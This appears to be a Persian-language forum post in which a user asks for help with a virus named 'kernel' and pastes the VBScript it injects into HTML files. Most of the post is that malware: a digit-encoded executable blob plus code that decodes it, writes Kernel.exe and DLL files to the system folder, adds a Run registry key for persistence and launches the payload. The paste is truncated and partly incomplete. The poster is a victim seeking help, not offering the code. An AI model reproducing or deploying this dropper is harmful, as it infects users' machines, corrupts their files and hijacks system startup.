سلام
ببینید کامپیوتر من هر چند وقت یکبار ویروسی به نام kernel می گیرد که
۱ - CPU Use را صد در صد می کند .
۲ - یه سری کد به همه ی فایل های html اضافه می کند و حجم آ نها را چند برابر می کند و اگه زودتر درستش نکنم وقتی فایل ها را باز کنم آن ها را خودکار پاک می کند .
با هر آنتی ویروسی هم سعی کرده ام برای مدتی پاک شده ولی فایل های html درست نشده .
این کد ها را اضافه می کند:
<script language=vbscript>
on error resume next
fileexe1="0770901440000030000000000040000000002552 55000000184000000000000000000000064000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000001840000000 00014031186014000180009205033184001076205033084104 10511503211211411110311409710903209909711011011111 60320981010321141171100321051100320680790830321091 11100101046013013010036000000000000000000000212036 14202814406922407914406922407914406922407903009024 30791350692240791081012420791470692240790821050991 04144069224079000000000000000000000000000000000000 00000000000008006900000007600100300008111504706900 00000000000000000000002240000150010110010050120000 02000000000030006000000000000000007017000000000016 00000000003200000000000006400000001600000000000200 00000040000000000040000000000040000000000000000000 00000080006000000004000000139039000000002000000000 00000001600000001600000000000001600000001600000000 00000000000160000000000000000000000000000000000680 32000000100000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000320000000680000000000000000000000000 00000000000000000000000000000000000000000000000000 00000004611610112011600000000024000100000000001600 00000000020000000000040000000000000000000000000000 00000000000000032000000096046114100097116097000000 25000100000000003200000000000200000000000600000000 00000000000000000000000000000000000640000000640461 00097116097000000000128027006000000048000000000002 00000000000800000000000000000000000000000000000000 00000640000001920000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000106000106000106000 10600110600023220700100000016311207507000010600010 40000000001281060001060001040410480640002550531120 75070000232181001000000163116075070000104120075070 00010412802600600010424004806400025505311607507000 02321560010000001040040010000001041240750700002322 31000000000104028048064000104124075070000232244000 00000010400001600000010408804806400010412407507000 02322020000000001632240480640001060001042280480640 00255053120075070000104240048064000255053224048064 00023217400000000025505322404806400023214500000000 02550531120750700002320320010000002550531160750700 00232021001000000106005106000106000104124075070000 10600010600023207300000000019508513923613119622810 60001060001060001410692280802320630000000000111921 16020141069228080232062000000000141069228080232035 00000000023521720119510400001606400010422414700400 01060001060002320240000000002321852552552551952550 37020032064000255037040032064000255037036032064000 25503703203206400025503702803206400025503700003206 40002550370120320640002550370080320640002550370040 32064000204204204204204204204204204204085139236087 25511700823203600000000013912500813907701200324805 12100511921380040101360040581311940011321921172430 95139069008201194008000204204204085139236139069008 13123200413119200412805600011604812812000100011603 21281200020001160161281200030001172300430690081311 92003201194004000043069008131192002201194004000043 06900813119200120119400400004306900820119400400025 50370600320640002550370480320640002550370520320640 00255037056032064000000000000000000000000000000000 00000000000000000008603300000013403300000012203300 00001000330000000000000000002360320000000000000000 00054033000000042033000000028033000000008033000000 00000000000018203300000019803300000021803300000016 00330000000000000000001880320000000000000000000000 00000000252032000000020032000000196032000000000000 00000000000000000007403300000002803200000016803200 00000000000000000000000000001460330000000000320000 00216032000000000000000000000000000000238033000000 04803200000000000000000000000000000000000000000000 00000000000000000000000860330000001340330000001220 33000000100033000000000000000000236032000000000000 00000005403300000004203300000002803300000000803300 00000000000000001820330000001980330000002180330000 00160033000000000000000000103000083104101108108069 12010109911711610106500011510410110810805105004610 01081080001400000681051151120971160991040771011151 15097103101065000000025001071101116077101115115097 10310106500002300208310111608410510910111400000006 60020841140971101151080971161010771011151150971031 01000000117115101114051050046100108108000000026000 06710811111510107209711010010810100006000107110111 60831211151161011090681051141010991161111141210650 00202001079112101110070105108101000000158002087114 10511610107010510810100010710111411010110805105004 61001081080000001050000731101161011141101011160671 08111115101072097110100108101000134000073110116101 11411010111607911210111006500013500007311011610111 41101011160791121011100851141080650000001420000731 10116101114110101116082101097100070105108101000000 11910511010511010111604610010810800000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000092083121115 11610110911504610112010100010411611611205804704710 40490461141051121190971210460991111090471001141010 97109104097099107047072047078097118105100104097099 10704610112010100000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll",1).readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
نوشته شده توسط Booseh_ye_Irani
.gif "N Aggressive (40)")
مشكله ريست شدن
.gif "N Aggressive (25)")
؟كسي ميتونه كمكم كنه؟ البته Nod32 هم نصبه.با تمامي تنظيمات
.gif "N Aggressive (4)")
.gif "N Aggressive (45)")
